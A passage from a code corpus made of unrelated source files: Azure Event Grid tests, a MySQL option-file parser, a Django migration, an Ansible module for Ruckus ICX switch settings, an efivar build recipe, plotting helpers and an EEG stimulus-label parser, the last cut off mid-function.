@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_none(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
}
data = None
cloud_event = CloudEvent(attributes, data)
await client.send(cloud_event)
@EventGridPreparer()
@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_str(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
}
data = "hello world"
cloud_event = CloudEvent(attributes, data)
def callback(request):
req = json.loads(request.http_request.body)
assert req[0].get("data_base64") is None
assert req[0].get("data") is not None
await client.send(cloud_event, raw_request_hook=callback)
@EventGridPreparer()
@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_as_list(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
}
data = "hello world"
cloud_event = CloudEvent(attributes, data)
await client.send([cloud_event])
@EventGridPreparer()
@recorded_by_proxy_async
@pytest.mark.asyncio
async def test_send_cloud_event_data_with_extensions(self, variables, eventgrid_cloud_event_topic_endpoint):
client = self.create_eg_publisher_client(eventgrid_cloud_event_topic_endpoint)
attributes = {
"type": "com.example.sampletype1",
"source": "https://example.com/event-producer",
"ext1": "extension"
}
data = "hello world"
cloud_event = CloudEvent(attributes, data)
await client.send([cloud_event])
| StarcoderdataPython |
224581 | <filename>plugins/holland.backup.mysqldump/holland/backup/mysqldump/mysql/option.py
"""MySQL option files support
http://dev.mysql.com/doc/refman/5.1/en/option-files.html
"""
import os
import re
import codecs
import logging
from holland.backup.mysqldump.util import INIConfig, BasicConfig
from holland.backup.mysqldump.util.config import update_config
from holland.backup.mysqldump.util.ini import ParsingError
LOG = logging.getLogger(__name__)
def merge_options(path,
*defaults_files,
**kwargs):
defaults_config = INIConfig()
defaults_config._new_namespace('client')
for config in defaults_files:
_my_config = load_options(config)
update_config(defaults_config, _my_config)
for key in ('user', 'password', 'socket', 'host', 'port'):
if kwargs.get(key) is not None:
defaults_config['client'][key] = kwargs[key]
write_options(defaults_config, path)
def load_options(filename):
"""Load mysql option file from filename"""
filename = os.path.abspath(os.path.expanduser(filename))
cfg = INIConfig()
try:
cfg._readfp(open(filename, 'r'))
except ParsingError, exc:
LOG.debug("Skipping unparsable lines")
for lineno, line in exc.errors:
LOG.debug("Ignored line %d: %s", lineno, line.rstrip())
return client_sections(cfg)
def unquote(value):
"""Remove quotes from a string."""
if len(value) > 1 and value[0] == '"' and value[-1] == '"':
value = value[1:-1]
# substitute meta characters per:
# http://dev.mysql.com/doc/refman/5.0/en/option-files.html
MYSQL_META = {
'b' : "\b",
't' : "\t",
'n' : "\n",
'r' : "\r",
'\\': "\\",
's' : " ",
'"' : '"',
}
return re.sub(r'\\(["btnr\\s])',
lambda m: MYSQL_META[m.group(1)],
value)
def quote(value):
"""Added quotes around a value"""
return '"' + value.replace('"', '\\"') + '"'
def client_sections(config):
"""Create a copy of config with only valid client auth sections
This includes [client], [mysql] and [mysqldump] with only options
related to mysql authentication.
"""
clean_cfg = INIConfig()
clean_cfg._new_namespace('client')
valid_sections = ['client', 'mysql', 'holland']
for section in valid_sections:
if section in config:
clean_section = client_keys(config[section])
update_config(clean_cfg.client, clean_section)
return clean_cfg
def client_keys(config):
"""Create a copy of option_section with non-authentication options
stripped out.
Authentication options supported are:
user, password, host, port, and socket
"""
clean_namespace = BasicConfig()
update_config(clean_namespace, config)
valid_keys = ['user', 'password', 'host', 'port', 'socket']
for key in config:
if key not in valid_keys:
del clean_namespace[key]
else:
clean_namespace[key] = unquote(config[key])
return clean_namespace
def write_options(config, filename):
quoted_config = INIConfig()
update_config(quoted_config, config)
for section in config:
for key in config[section]:
if '"' in config[section][key]:
config[section][key] = quote(config[section][key])
if isinstance(filename, basestring):
filename = codecs.open(filename, 'w', 'utf8')
data = unicode(config)
print >>filename, data
filename.close()
| StarcoderdataPython |
6478296 | <reponame>epanjwani/activity
# Generated by Django 2.2.10 on 2020-08-17 15:24
import datetime
from django.db import migrations, models
import django.db.models.deletion
import formlibrary.models.case
class Migration(migrations.Migration):
dependencies = [
('formlibrary', '0009_merge_20200620_0127'),
]
operations = [
migrations.AlterField(
model_name='individual',
name='create_date',
field=models.DateTimeField(blank=True, default=datetime.datetime.now, null=True, verbose_name='Creation date'),
),
migrations.RenameField(
model_name='individual',
old_name='remarks',
new_name='description',
),
migrations.RenameField(
model_name='individual',
old_name='household',
new_name='household_id',
),
migrations.RenameField(
model_name='individual',
old_name='father_name',
new_name='id_number',
),
migrations.RenameField(
model_name='individual',
old_name='gender',
new_name='id_type',
),
migrations.RemoveField(
model_name='individual',
name='distribution',
),
migrations.RemoveField(
model_name='individual',
name='training',
),
migrations.AddField(
model_name='individual',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Created by'),
),
migrations.AddField(
model_name='individual',
name='date_of_birth',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='individual',
name='head_of_household',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='individual',
name='last_name',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='individual',
name='modified_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Last Modified by'),
),
migrations.AddField(
model_name='individual',
name='photo',
field=models.ImageField(blank=True, null=True, upload_to=None),
),
migrations.AddField(
model_name='individual',
name='primary_number',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='individual',
name='secondary_number',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='individual',
name='sex',
field=models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female')], max_length=1, null=True),
),
migrations.RemoveField(
model_name='individual',
name='program',
),
migrations.AddField(
model_name='individual',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Program'),
),
migrations.RemoveField(
model_name='individual',
name='id',
),
migrations.AddField(
model_name='individual',
name='case_ptr',
field=models.OneToOneField(auto_created=True, default=0, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='formlibrary.Case'),
preserve_default=False,
),
migrations.RemoveField(
model_name='individual',
name='age',
),
migrations.AddField(
model_name='household',
name='city',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='household',
name='country',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='household',
name='create_date',
field=models.DateTimeField(blank=True, default=datetime.datetime.now, null=True, verbose_name='Creation date'),
),
migrations.AddField(
model_name='household',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Created by'),
),
migrations.AddField(
model_name='household',
name='email',
field=models.CharField(blank=True, max_length=100, validators=[django.core.validators.RegexValidator(message='Invalid Email Address.', regex='^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$')]),
),
migrations.AddField(
model_name='household',
name='individuals',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='formlibrary.Individual'),
),
migrations.AddField(
model_name='household',
name='modified_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='workflow.ActivityUser', verbose_name='Last Modified by'),
),
migrations.AddField(
model_name='household',
name='modified_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Last Modification date'),
),
migrations.AddField(
model_name='household',
name='postal_code',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='household',
name='prim_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AddField(
model_name='household',
name='secondary_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AddField(
model_name='household',
name='street',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.RemoveField(
model_name='household',
name='prim_phone',
),
migrations.RemoveField(
model_name='individual',
name='primary_number',
),
migrations.RemoveField(
model_name='individual',
name='secondary_number',
),
migrations.AddField(
model_name='household',
name='primary_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AddField(
model_name='individual',
name='primary_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AddField(
model_name='individual',
name='secondary_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AlterField(
model_name='household',
name='secondary_phone',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Invalid Phone Number. Format: '+123456789'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
migrations.AlterField(
model_name='individual',
name='photo',
field=models.ImageField(blank=True, null=True, upload_to='media/images', validators=[formlibrary.models.case.validate_image]),
),
] | StarcoderdataPython |
3558979 | <filename>lib/python3.8/site-packages/ansible_collections/community/network/plugins/modules/network/icx/icx_system.py
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: icx_system
author: "Ruckus Wireless (@Commscope)"
short_description: Manage the system attributes on Ruckus ICX 7000 series switches
description:
- This module provides declarative management of node system attributes
on Ruckus ICX 7000 series switches. It provides an option to configure host system
parameters or remove those parameters from the device active
configuration.
notes:
- Tested against ICX 10.1.
- For information on using ICX platform, see L(the ICX OS Platform Options guide,../network/user_guide/platform_icx.html).
options:
hostname:
description:
- Configure the device hostname parameter. This option takes an ASCII string value.
type: str
domain_name:
description:
- Configure the IP domain name on the remote device to the provided value.
Value should be in the dotted name form and
will be appended to the hostname to create a fully-qualified domain name.
type: list
domain_search:
description:
- Provides the list of domain names to
append to the hostname for the purpose of doing name resolution.
This argument accepts a list of names and will be reconciled
with the current active configuration on the running node.
type: list
name_servers:
description:
- List of DNS name servers by IP address to use to perform name resolution
lookups.
type: list
aaa_servers:
description:
- Configures radius/tacacs server
type: list
suboptions:
type:
description:
- specify the type of the server
type: str
choices: ['radius','tacacs']
hostname:
description:
- Configures the host name of the RADIUS server
type: str
auth_port_type:
description:
- specifies the type of the authentication port
type: str
choices: ['auth-port']
auth_port_num:
description:
- Configures the authentication UDP port. The default value is 1812.
type: str
acct_port_num:
description:
- Configures the accounting UDP port. The default value is 1813.
type: str
acct_type:
description:
- Usage of the accounting port.
type: str
choices: ['accounting-only', 'authentication-only','authorization-only', default]
auth_key:
description:
- Configure the key for the server
type: str
auth_key_type:
description:
- List of authentication level specified in the choices
type: list
choices: ['dot1x','mac-auth','web-auth']
state:
description:
- State of the configuration
values in the device's current active configuration. When set
to I(present), the values should be configured in the device active
configuration and when set to I(absent) the values should not be
in the device active configuration
type: str
default: present
choices: ['present', 'absent']
check_running_config:
description:
- Check running configuration. This can be set as environment variable.
Module will use environment variable value(default:True), unless it is overridden, by specifying it as module parameter.
type: bool
default: yes
'''
EXAMPLES = """
- name: Configure hostname and domain name
community.network.icx_system:
hostname: icx
domain_search:
- ansible.com
- redhat.com
- ruckus.com
- name: Configure radius server of type auth-port
community.network.icx_system:
aaa_servers:
- type: radius
hostname: radius-server
auth_port_type: auth-port
auth_port_num: 1821
acct_port_num: 1321
acct_type: accounting-only
auth_key: abc
auth_key_type:
- dot1x
- mac-auth
- name: Configure tacacs server
community.network.icx_system:
aaa_servers:
- type: tacacs
hostname: tacacs-server
auth_port_type: auth-port
auth_port_num: 1821
acct_port_num: 1321
acct_type: accounting-only
auth_key: xyz
- name: Configure name servers
community.network.icx_system:
name_servers:
- 8.8.8.8
- 8.8.4.4
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- hostname icx
- ip domain name test.example.com
- radius-server host 172.16.10.12 auth-port 2083 acct-port 1850 default key abc dot1x mac-auth
- tacacs-server host 10.2.3.4 auth-port 4058 authorization-only key xyz
"""
import re
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible_collections.community.network.plugins.module_utils.network.icx.icx import get_config, load_config
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import ComplexList, validate_ip_v6_address
from ansible.module_utils.connection import Connection, ConnectionError, exec_command
def diff_list(want, have):
adds = [w for w in want if w not in have]
removes = [h for h in have if h not in want]
return (adds, removes)
def map_obj_to_commands(want, have, module):
commands = list()
state = module.params['state']
def needs_update(x):
return want.get(x) is not None and (want.get(x) != have.get(x))
if state == 'absent':
if have['name_servers'] == [] and have['aaa_servers'] == [] and have['domain_search'] == [] and have['hostname'] is None:
if want['hostname']:
commands.append('no hostname')
if want['domain_search']:
for item in want['domain_search']:
commands.append('no ip dns domain-list %s' % item)
if want['name_servers']:
for item in want['name_servers']:
commands.append('no ip dns server-address %s' % item)
if want['aaa_servers']:
want_servers = []
want_server = want['aaa_servers']
if want_server:
want_list = deepcopy(want_server)
for items in want_list:
items['auth_key'] = None
want_servers.append(items)
for item in want_servers:
ipv6addr = validate_ip_v6_address(item['hostname'])
if ipv6addr:
commands.append('no ' + item['type'] + '-server host ipv6 ' + item['hostname'])
else:
commands.append('no ' + item['type'] + '-server host ' + item['hostname'])
if want['hostname']:
if have['hostname'] == want['hostname']:
commands.append('no hostname')
if want['domain_search']:
for item in want['domain_search']:
if item in have['domain_search']:
commands.append('no ip dns domain-list %s' % item)
if want['name_servers']:
for item in want['name_servers']:
if item in have['name_servers']:
commands.append('no ip dns server-address %s' % item)
if want['aaa_servers']:
want_servers = []
want_server = want['aaa_servers']
have_server = have['aaa_servers']
if want_server:
want_list = deepcopy(want_server)
for items in want_list:
items['auth_key'] = None
want_servers.append(items)
for item in want_servers:
if item in have_server:
ipv6addr = validate_ip_v6_address(item['hostname'])
if ipv6addr:
commands.append('no ' + item['type'] + '-server host ipv6 ' + item['hostname'])
else:
commands.append('no ' + item['type'] + '-server host ' + item['hostname'])
elif state == 'present':
if needs_update('hostname'):
commands.append('hostname %s' % want['hostname'])
if want['domain_search']:
adds, removes = diff_list(want['domain_search'], have['domain_search'])
for item in removes:
commands.append('no ip dns domain-list %s' % item)
for item in adds:
commands.append('ip dns domain-list %s' % item)
if want['name_servers']:
adds, removes = diff_list(want['name_servers'], have['name_servers'])
for item in removes:
commands.append('no ip dns server-address %s' % item)
for item in adds:
commands.append('ip dns server-address %s' % item)
if want['aaa_servers']:
want_servers = []
want_server = want['aaa_servers']
have_server = have['aaa_servers']
want_list = deepcopy(want_server)
for items in want_list:
items['auth_key'] = None
want_servers.append(items)
adds, removes = diff_list(want_servers, have_server)
for item in removes:
ip6addr = validate_ip_v6_address(item['hostname'])
if ip6addr:
cmd = 'no ' + item['type'] + '-server host ipv6 ' + item['hostname']
else:
cmd = 'no ' + item['type'] + '-server host ' + item['hostname']
commands.append(cmd)
for w_item in adds:
for item in want_server:
if item['hostname'] == w_item['hostname'] and item['type'] == w_item['type']:
auth_key = item['auth_key']
ip6addr = validate_ip_v6_address(w_item['hostname'])
if ip6addr:
cmd = w_item['type'] + '-server host ipv6 ' + w_item['hostname']
else:
cmd = w_item['type'] + '-server host ' + w_item['hostname']
if w_item['auth_port_type']:
cmd += ' ' + w_item['auth_port_type'] + ' ' + w_item['auth_port_num']
if w_item['acct_port_num'] and w_item['type'] == 'radius':
cmd += ' acct-port ' + w_item['acct_port_num']
if w_item['type'] == 'tacacs':
if any((w_item['acct_port_num'], w_item['auth_key_type'])):
module.fail_json(msg='acct_port and auth_key_type is not applicable for tacacs server')
if w_item['acct_type']:
cmd += ' ' + w_item['acct_type']
if auth_key is not None:
cmd += ' key ' + auth_key
if w_item['auth_key_type'] and w_item['type'] == 'radius':
val = ''
for y in w_item['auth_key_type']:
val = val + ' ' + y
cmd += val
commands.append(cmd)
return commands
def parse_hostname(config):
match = re.search(r'^hostname (\S+)', config, re.M)
if match:
return match.group(1)
def parse_domain_search(config):
match = re.findall(r'^ip dns domain[- ]list (\S+)', config, re.M)
matches = list()
for name in match:
matches.append(name)
return matches
def parse_name_servers(config):
matches = list()
values = list()
lines = config.split('\n')
for line in lines:
if 'ip dns server-address' in line:
values = line.split(' ')
for val in values:
match = re.search(r'([0-9.]+)', val)
if match:
matches.append(match.group())
return matches
def parse_aaa_servers(config):
configlines = config.split('\n')
obj = []
for line in configlines:
auth_key_type = []
if 'radius-server' in line or 'tacacs-server' in line:
aaa_type = 'radius' if 'radius-server' in line else 'tacacs'
match = re.search(r'(host ipv6 (\S+))|(host (\S+))', line)
if match:
hostname = match.group(2) if match.group(2) is not None else match.group(4)
match = re.search(r'auth-port ([0-9]+)', line)
if match:
auth_port_num = match.group(1)
else:
auth_port_num = None
match = re.search(r'acct-port ([0-9]+)', line)
if match:
acct_port_num = match.group(1)
else:
acct_port_num = None
match = re.search(r'acct-port [0-9]+ (\S+)', line)
if match:
acct_type = match.group(1)
else:
acct_type = None
if aaa_type == 'tacacs':
match = re.search(r'auth-port [0-9]+ (\S+)', line)
if match:
acct_type = match.group(1)
else:
acct_type = None
match = re.search(r'(dot1x)', line)
if match:
auth_key_type.append('dot1x')
match = re.search(r'(mac-auth)', line)
if match:
auth_key_type.append('mac-auth')
match = re.search(r'(web-auth)', line)
if match:
auth_key_type.append('web-auth')
obj.append({
'type': aaa_type,
'hostname': hostname,
'auth_port_type': 'auth-port',
'auth_port_num': auth_port_num,
'acct_port_num': acct_port_num,
'acct_type': acct_type,
'auth_key': None,
'auth_key_type': set(auth_key_type) if len(auth_key_type) > 0 else None
})
return obj
def map_config_to_obj(module):
compare = module.params['check_running_config']
config = get_config(module, None, compare=compare)
return {
'hostname': parse_hostname(config),
'domain_search': parse_domain_search(config),
'name_servers': parse_name_servers(config),
'aaa_servers': parse_aaa_servers(config)
}
def map_params_to_obj(module):
if module.params['aaa_servers']:
for item in module.params['aaa_servers']:
if item['auth_key_type']:
item['auth_key_type'] = set(item['auth_key_type'])
obj = {
'hostname': module.params['hostname'],
'domain_name': module.params['domain_name'],
'domain_search': module.params['domain_search'],
'name_servers': module.params['name_servers'],
'state': module.params['state'],
'aaa_servers': module.params['aaa_servers']
}
return obj
def main():
""" Main entry point for Ansible module execution
"""
server_spec = dict(
type=dict(choices=['radius', 'tacacs']),
hostname=dict(),
auth_port_type=dict(choices=['auth-port']),
auth_port_num=dict(),
acct_port_num=dict(),
acct_type=dict(choices=['accounting-only', 'authentication-only', 'authorization-only', 'default']),
auth_key=dict(),
auth_key_type=dict(type='list', choices=['dot1x', 'mac-auth', 'web-auth'])
)
argument_spec = dict(
hostname=dict(),
domain_name=dict(type='list'),
domain_search=dict(type='list'),
name_servers=dict(type='list'),
aaa_servers=dict(type='list', elements='dict', options=server_spec),
state=dict(choices=['present', 'absent'], default='present'),
check_running_config=dict(default=True, type='bool', fallback=(env_fallback, ['ANSIBLE_CHECK_ICX_RUNNING_CONFIG']))
)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
result['warnings'] = warnings
exec_command(module, 'skip')
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(want, have, module)
result['commands'] = commands
if commands:
if not module.check_mode:
load_config(module, commands)
result['changed'] = True
module.exit_json(**result)
if __name__ == "__main__":
main()
| StarcoderdataPython |
6501869 | pkgname = "efivar"
pkgver = "37"
pkgrel = 0
build_style = "makefile"
make_cmd = "gmake"
make_build_target = "all"
make_build_args = ["libdir=/usr/lib", "ERRORS="]
make_install_args = ["libdir=/usr/lib"]
make_check_target = "test"
hostmakedepends = ["pkgconf", "gmake"]
makedepends = ["linux-headers"]
pkgdesc = "Tools and libraries to work with EFI variables"
maintainer = "q66 <<EMAIL>>"
license = "LGPL-2.1-or-later"
url = "https://github.com/rhboot/efivar"
source = f"{url}/releases/download/{pkgver}/{pkgname}-{pkgver}.tar.bz2"
sha256 = "3c67feb93f901b98fbb897d5ca82931a6698b5bcd6ac34f0815f670d77747b9f"
tool_flags = {"CFLAGS": ["-D_GNU_SOURCE"]}
def post_build(self):
self.make.invoke(None, ["-C", "src/test"])
def post_install(self):
self.install_bin("src/test/tester", name = "efivar-tester")
@subpackage("libefivar")
def _lib(self):
self.pkgdesc = f"{pkgdesc} (runtime library)"
return self.default_libs()
@subpackage("efivar-devel")
def _devel(self):
return self.default_devel()
| StarcoderdataPython |
1747760 | <reponame>PacktPublishing/Learn-Quantum-Computing-with-Python
from pyquil import Program
from pyquil.gates import *
program = Program()
program = program + X(0)
print(program) | StarcoderdataPython |
161541 | import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import matplotlib.cm as cm
from matplotlib.lines import Line2D
def plotMeasurement(L, indices, measurements, s=0.25, filename=None, title=None, url=None):
fig = plt.figure()
axes = fig.add_subplot(111, projection='3d')
x, y, z = [], [], []
dx, dy, dz, c = [], [], [], []
l = 1. - s
cmap = plt.get_cmap('plasma')
column_names = []
for j in range(L):
name = '{0}L'.format(str(j+1))
column_names.append(name)
name = '{0}R'.format(str(j+1))
column_names.append(name)
for index, measurement in zip(indices, measurements):
i, si, j, sj, label = index
idx_i = 2*i
if si == 'r':
idx_i += 1
idx_j = 2*j
if sj == 'r':
idx_j += 1
x += [idx_i]
y += [idx_j]
z += [0]
dx += [l]
dy += [l]
dz += [measurement]
c += [cmap(measurement)]
ticks = np.arange(0, 2*L, 1)
axes.set_zlim(0., 1.)
axes.set_xticks(ticks)
axes.set_xticklabels(column_names)
axes.set_yticks(ticks)
axes.set_yticklabels(column_names)
axes.set_xlabel('source')
axes.set_ylabel('target')
axes.set_zlabel('$P$')
axes.bar3d(x, y, z, dx, dy, dz, color=c, zsort='max', shade=True, edgecolor='white')
if url is not None:
axes.text(-0.75, 2*L+1, 0.0, url, 'y', fontsize=7)
x_txt = axes.text(0, 0, 1.01, '$135^{\circ}$', 'x')
y_txt = axes.text(0, 2*L-0.2, 1.015, '$45^{\circ}$', 'y')
x_title = axes.text(2*L, 2*L, 1.2, title, 'y', fontsize=20)
y_title = axes.text(2*L, 0, 1.25, title, 'x', fontsize=20)
axes.view_init(elev=45, azim=45)
if filename is not None:
x_txt.set_visible(False)
y_txt.set_visible(True)
x_title.set_visible(False)
y_title.set_visible(True)
fig.savefig(filename + '_45.png', transparent=True, bbox_inches='tight', pad_inches=0)
axes.view_init(elev=45, azim=135)
if filename is not None:
x_txt.set_visible(True)
y_txt.set_visible(False)
x_title.set_visible(True)
y_title.set_visible(False)
fig.savefig(filename + '_135.png', transparent=True, bbox_inches='tight', pad_inches=0)
def plotExpectations(times, expects, labels, colors, styles, linewidths, title, filename, axvlines=[]):
fig, ax = plt.subplots(1, 1, constrained_layout=True)
ax.set_title(title)
ax.set_xlabel('t')
ax.grid()
for x in axvlines:
ax.axvline(x=x, color='black', linestyle='--')
for measurement, label, color, style, width in zip(expects, labels, colors, styles, linewidths):
ax.plot(times, measurement, label=label, color=color, linestyle=style, linewidth=width)
ax.legend()
fig.savefig(filename, transparent=True)
# from: https://matplotlib.org/stable/gallery/lines_bars_and_markers/barchart.html#sphx-glr-gallery-lines-bars-and-markers-barchart-py
def plotTeleportationOutcomes(outcomes, corrs, labels, title, url=None, filename=None):
x = np.arange(len(labels)) # the label locations
width = 0.35 # the width of the bars
fig, ax = plt.subplots(1, 1, constrained_layout=True)
rects1 = ax.bar(x - width/2, outcomes, width, label='not corrected')
rects2 = ax.bar(x + width/2, corrs, width, label='corrected')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('fidelity')
ax.set_title(title)
ax.set_xticks(x)
ax.set_xticklabels(labels)
ax.legend()
ax.bar_label(rects1, padding=3)
ax.bar_label(rects2, padding=3)
if url is not None:
ax.text(0, -0.1, url, fontsize=7)
fig.tight_layout()
if filename is not None:
fig.savefig(filename, transparent=True)
def plotHbdgSpectrum(L, mus, spectrum, title, mark=None, url=None, url_x=None, url_y=None, filename=None):
fig, ax = plt.subplots(1, 1, constrained_layout=True)
ax.set_title(title)
ax.set_xlabel('$\mu$')
ax.set_ylabel('$E$')
ax.set_xlim(0., mus[-1])
for j in range(2*L):
ax.plot(mus, spectrum[:, j], color='black')
if mark is not None:
ax.axvline(x=mark, color='red', linestyle='--')
if url is not None:
pos_y = -0.1
if url_y is not None:
pos_y = url_y
pos_x = 0.0
if url_x is not None:
pos_x = url_x
ax.text(pos_x, pos_y, url, fontsize=9)
fig.savefig(filename, transparent=True)
| StarcoderdataPython |
8127751 | <reponame>powerfulbean/StellarWave<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 27 17:57:19 2022
@author: <NAME>
"""
import os
from abc import abstractmethod,ABC
from .. import outsideLibInterfaces as outLib
from ..DataIO import getFileName
from .Cache import CStimuliCache
from ..DataStruct.Abstract import CLabels
from ..DataStruct.StimuliData import CAuditoryStimulus
import datetime
import numpy as np
class CVisualLabels(CLabels):
def stimuliEventParser(self,buffer, stimuliStartTag, StimuliEndTag, i, recordObject):
stimuliStart = buffer[i]
if(stimuliStart[0] == stimuliStartTag):
temp = stimuliStart[1]
realName = temp
recordObject.name = realName
temp = stimuliStart[2:len(stimuliStart)] # calculate start time
[h,m,s,ms] = [int(t) for t in temp]
startTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
recordObject.startTime = startTime
i+=1
stimuliEnd = buffer[i]
#the audio End Label
if(stimuliEnd[0] == StimuliEndTag):
recordObject.index = stimuliEnd[1]
temp = stimuliEnd[2:len(stimuliEnd)] # calculate end time
[h,m,s,ms] = [int(t) for t in temp]
endTime = datetime.datetime(self.startTime.year,self.startTime.month,self.startTime.day,h,m,s,ms)
recordObject.endTime = endTime
i+=1
else:
print("visuallabels, parser error")
else:
print("visuallabels, parser error")
return i, recordObject
def readFile(self,fileName, readStimuli = False, stimuliDir = None):
'''
read all the necessary information from the label files
'''
#include the OutsideLib module for Input/Output
self.outLibIO = outLib._OutsideLibIO()
self.description = 'Visual'
self.type = "Visual"
buffer = []
with open(fileName, 'r') as the_file: #opoen the labels file
lines = the_file.readlines()
for line in lines: # read the label file
temp = line.split()
buffer.append(temp)
i = 0
while( i < len(buffer)): #buffer is the whole document
#the first line, save the start date
if(i == 0):
[a,b,c,d,e,f] = [int(j) for j in buffer[i] if (j != '-' and j != ':') ]
self.startTime = datetime.datetime(a,b,c,d,e,f) # Lib: datetime
i+=1
if(buffer[i][0] == 'First' or buffer[i][0] == 'Second' or buffer[i][0] == 'Cat' ):
stimuliIdx = 0
if(buffer[i][0] == 'First'):
stimuliIdx = 1
elif( buffer[i][0] == 'Second'):
stimuliIdx = 2
elif(buffer[i][0] == 'Cat'):
stimuliIdx = 0
else:
stimuliIdx = -1
i+=1
while(buffer[i][0] == 'sub'):
tempRecord = CTimeIntervalStamp('','','','') #store crossing time
tempRecord2 = CTimeIntervalStamp('','','','') #store stimuli time
tempRecord3 = CTimeIntervalStamp('','','','') #store rest time
i+=1
if(buffer[i][0] == 'attendStart'):
i,tempRecord = self.stimuliEventParser(buffer,'attendStart','attendEnd',i,tempRecord)
elif(buffer[i][0] == 'unattendStart'):
i,tempRecord = self.stimuliEventParser(buffer,'unattendStart','unattendEnd',i,tempRecord)
elif(buffer[i][0] == 'crossingStart'):
i,tempRecord = self.stimuliEventParser(buffer,'crossingStart','crossingEnd',i,tempRecord)
else:
raise Exception("don't recognize the type "+ str(buffer[i][0])+' please check the file')
i,tempRecord2 = self.stimuliEventParser(buffer,'imageStart','imageEnd',i,tempRecord2)
i,tempRecord3 = self.stimuliEventParser(buffer,'restStart','restEnd',i,tempRecord3)
tempName,t = os.path.splitext(tempRecord2.name)
tempRecord3.name = tempName + '_' + 'imagination'
tempRecord.type = 'cross'
tempRecord2.type = 'image'
tempRecord3.type = 'rest'
self.timestamps.append(tempRecord)
self.rawdata.append('crossing')
self.timestamps.append(tempRecord2)
self.rawdata.append(str(stimuliIdx))
self.timestamps.append(tempRecord3)
self.rawdata.append('rest')
elif(buffer[i][0]=='-1'):
break
else:
print("visuallabels, readFile error")
return
def loadStimuli(self,Folder, extension, oCache : CStimuliCache = None):
'''
load stimuli in self.timestamps(CTimeIntervalStamp).stimuli
'''
pass
class CBlinksCaliLabels(CLabels):
def readFile(self, fileName):
self.outLibIO = outLib._OutsideLibIO()
tempName= getFileName(fileName)
self.description = 'BlinksCali_' + tempName
self.type = "BlinksCali"
buffer = []
with open(fileName, 'r') as the_file: #opoen the labels file
lines = the_file.readlines()
for line in lines: # read the label file
temp = line.split()
buffer.append(temp)
i = 0
self.startTime = self.parseTimeString(buffer[i][1] + ' ' + buffer[i][2])
while( i < len(buffer)): #buffer is the whole document
